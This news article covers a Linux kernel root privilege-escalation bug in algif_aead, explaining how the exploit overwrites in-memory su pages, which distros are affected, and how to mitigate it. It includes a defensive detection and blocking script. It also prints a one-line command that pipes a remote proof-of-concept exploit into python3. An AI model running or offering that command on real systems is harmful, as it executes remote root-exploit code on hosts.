Linux Root Exploit CVE-2026-31431 Hits Most Distros Since 2017

Key Takeaways

- CVE-2026-31431 grants instant root access to unprivileged local users on most Linux distributions
- The vulnerability has existed since 2017 and affects Ubuntu, RHEL, SUSE, Amazon Linux, and WSL2
- Kernel patches are available, but distro-specific fixes are still rolling out
A Cryptography Shortcut Gone Wrong
Security researchers at Xint Code have disclosed CVE-2026-31431, a privilege escalation vulnerability that grants instant root access to any local unprivileged user. The exploit requires just 732 bytes of code to execute. It has existed in the Linux kernel since 2017.
The bug sits in algif_aead, the kernel module that exposes authenticated encryption (AEAD) to user space through the AF_ALG socket interface. The module includes a performance optimization that avoids copying data: rather than copying the caller's authentication tag into its own buffer, it chains the tag data onto the output buffer by reference. That shortcut is the opening the attacker needs.
What's Affected
The vulnerability affects nearly every major Linux distribution in production use. Xint Code confirmed the following are vulnerable:
- Ubuntu 24 (and Ubuntu 26, released last week)
- RHEL 10
- SUSE 16
- Amazon Linux 2023
- Windows WSL2
The impact extends beyond desktop systems. Multi-user servers, container hosts and Kubernetes nodes (a container shares the host kernel, so a shell inside a container reaches the same AF_ALG code), CI/CD runners that execute untrusted jobs, and web servers all face exposure. Any environment in which someone can run code as a local user is at risk.
How the Exploit Works
AF_ALG is a socket interface that lets applications request encryption or decryption from the kernel. You bind a socket to an algorithm, set a key, and send the data to process (and, when decrypting with an AEAD cipher, the authentication tag); the kernel performs the cryptographic operation and hands back the result.
The attack feeds the tag to the socket with splice() rather than write(): the attacker splices in the contents of an executable they are allowed to read. The obvious choice is su, the setuid-root command that switches users. Because algif_aead chains the tag by reference rather than copying it, the kernel's output now lands in the pages that hold the su binary, and the attacker has turned read access to a file into write access to the memory pages every process executes it from.
The authencesn algorithm writes 4 bytes at a fixed offset in its output buffer. Since that output buffer is the chained su page data, those 4 bytes overwrite part of the binary in memory. The next time su runs, it executes the attacker's modification with root privileges.
Checking Your Systems
Xint Code published a proof-of-concept. You can test for the vulnerability by running the following as an unprivileged user:
curl https://copy.fail/exp | python3 && su
Two cautions. First, this command downloads and executes code from an external server; if you prefer not to trust that, Xint Code has published the source code for manual review and execution. Second, a successful run means the PoC has modified the in-memory copy of su on that host, so run it on a disposable VM or test box, not on a production server. A non-destructive first check is to find out whether algif_aead is present on your kernel at all (as a loaded or loadable module, or compiled in) and whether your distribution has shipped the fix.
Patching and Mitigation
The Linux kernel already has a patch available. However, the short disclosure window left distro maintainers scrambling. Not all distributions have released updated packages yet.
If your distro's patch isn't ready, two mitigation options exist:
Option 1: Disable the Module
If your kernel ships algif_aead as a loadable module, you can block it from loading by writing this rule (as root) to /etc/modprobe.d/disable-algif.conf:
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
The rule only prevents future loads. If the module is already loaded (lsmod | grep algif_aead), unload it with modprobe -r algif_aead, or the AF_ALG aead socket type stays available until the next reboot.
Option 2: Block AF_ALG Sockets
Some distributions compile algif_aead directly into the kernel; RHEL and WSL2 are among them (grep algif_aead /lib/modules/$(uname -r)/modules.builtin shows whether yours does). A modprobe rule does nothing for built-in code, so for these systems you need to prevent unprivileged users from opening AF_ALG sockets entirely. That can be done with a seccomp profile that denies socket() calls whose domain is AF_ALG, or with AppArmor or SELinux policy that restricts the socket family.
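As an added example (not Xint Code's PoC and not any distribution's tooling), the following POSIX shell script serves both the Checking Your Systems section and the two mitigation options above. It reads the kernel's module metadata (modules.builtin and modules.dep under /lib/modules/$(uname -r)) to tell whether algif_aead is compiled in, a loadable module, or absent; reports from /proc/modules whether the module is currently loaded; writes the Option 1 modprobe rule when run as root with --apply; and, for the built-in case, prints an Option 2 seccomp syscall rule in runc/Docker profile syntax. The function names, the --apply flag and the choice of output paths are this example's own assumptions; the constant 38 is AF_ALG as defined in <linux/socket.h>. It does not touch su or attempt the exploit.

```shell
#!/bin/sh
# Added example, not Xint Code's PoC or any distribution's tooling.
# Decides which of the two mitigations in the text applies to a kernel by
# reading the standard module metadata, then emits the matching artefact:
# a modprobe "install" rule when algif_aead is a loadable module, or a
# seccomp rule denying socket(AF_ALG, ...) when it is compiled in.
# File paths are parameters so the logic can be exercised on constructed
# inputs as well as on the running kernel. Needs only sh, grep and printf.

# How is algif_aead provided? Prints "builtin", "module" or "absent".
# $1: modules.builtin (one line per compiled-in module, e.g.
#     "kernel/crypto/algif_aead.ko")
# $2: modules.dep (one line per loadable module; the .ko may carry a
#     compression suffix such as .ko.zst, so only "algif_aead.ko" is matched)
algif_aead_state() {
    if [ -r "$1" ] && grep -q 'algif_aead\.ko' "$1"; then
        echo builtin
    elif [ -r "$2" ] && grep -q 'algif_aead\.ko' "$2"; then
        echo module
    else
        echo absent
    fi
}

# Is the module currently loaded? $1: /proc/modules (or a saved copy).
# Succeeds if some line starts with "algif_aead ".
algif_aead_loaded() {
    [ -r "$1" ] && grep -q '^algif_aead ' "$1"
}

# Option 1 from the text: stop modprobe from ever loading the module.
# $1: destination file, normally under /etc/modprobe.d/ (writing needs root).
write_modprobe_block() {
    printf 'install algif_aead /bin/false\n' > "$1"
}

# Option 2 from the text: a seccomp syscall rule (runc/Docker profile
# syntax) that makes socket(AF_ALG, ...) fail with EPERM. 38 is AF_ALG in
# <linux/socket.h>. This is a fragment for the "syscalls" array of a full
# profile, not a complete profile on its own.
seccomp_deny_af_alg() {
    cat <<'EOF'
{
  "names": ["socket"],
  "action": "SCMP_ACT_ERRNO",
  "args": [{"index": 0, "value": 38, "op": "SCMP_CMP_EQ"}]
}
EOF
}

# Report on the running kernel. Pass --apply (as root) to also write the
# modprobe rule. Unloading an already-loaded module is left to the operator
# (modprobe -r algif_aead), since it fails while an AF_ALG socket is open.
main() {
    moddir="/lib/modules/$(uname -r)"
    state=$(algif_aead_state "$moddir/modules.builtin" "$moddir/modules.dep")
    echo "algif_aead: $state"
    case "$state" in
    module)
        if algif_aead_loaded /proc/modules; then
            echo "currently loaded: run 'modprobe -r algif_aead' after blocking"
        fi
        if [ "${1:-}" = "--apply" ]; then
            write_modprobe_block /etc/modprobe.d/disable-algif.conf
            echo "wrote /etc/modprobe.d/disable-algif.conf"
        else
            echo "would write: install algif_aead /bin/false (use --apply as root)"
        fi
        ;;
    builtin)
        echo "compiled in: modprobe cannot block it; deny AF_ALG sockets, e.g.:"
        seccomp_deny_af_alg
        ;;
    absent)
        echo "not listed in this kernel's module metadata; nothing to block here"
        ;;
    esac
}

main "$@"
```

Run it without arguments as any user to get the report; the only write it ever performs is the modprobe rule, and only with --apply. The "absent" result means neither list mentions algif_aead, which is the case for kernels built without user-space AEAD support; it says nothing about whether the distribution's patched kernel package is installed, so still check the advisory.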
The Disclosure Timeline Question
Xint Code did not explain why they disclosed the vulnerability so quickly. They did note that an AI assistant helped them find the bug. Given that the Linux kernel source code is public, they may have reasoned that any serious attacker could find it just as easily.
This raises an uncomfortable question for open-source security. AI tools can now scan millions of lines of public code for exploitable patterns. The traditional coordinated disclosure window may need rethinking when both defenders and attackers have access to the same automated discovery tools.
Logicity's Take
What to Do Now
- Audit which systems have local user access. Prioritize multi-user servers, container hosts, and CI/CD runners.
- Check your distribution's security advisories for CVE-2026-31431 patches.
- Apply kernel updates immediately where available.
- Implement mitigations on systems without patches. Use module blocking or socket restrictions.
- Review access controls. Consider whether all users who have local shell access actually need it.
Frequently Asked Questions
Does CVE-2026-31431 affect cloud servers?
Yes, until it is patched. Any Linux server where users have local shell access is exposed. This includes shared hosting, multi-tenant environments, and systems running containers in which users get a shell, because a container shares the host's kernel.
Can this exploit be used remotely?
No. The attacker needs local user access to the system. However, combined with other exploits that grant initial access, it becomes a powerful escalation path.
Is WSL2 on Windows really affected?
Yes. WSL2 runs a real Linux kernel, and Microsoft's kernel build includes the vulnerable algif_aead functionality compiled directly in.
How long has this vulnerability existed?
The vulnerable code was introduced in 2017 and went unnoticed for more than eight years.
Should I reboot after applying the kernel patch?
Yes, unless your distribution delivers the fix as a kernel live patch (Canonical Livepatch, SUSE Live Patching, or kpatch on RHEL). With a regular kernel package update, the vulnerable code stays in memory until you reboot into the new kernel; check uname -r after the reboot to confirm the patched version is the one running.
Source: Latest from Tom's Hardware
Manaal Khan
Tech & Innovation Writer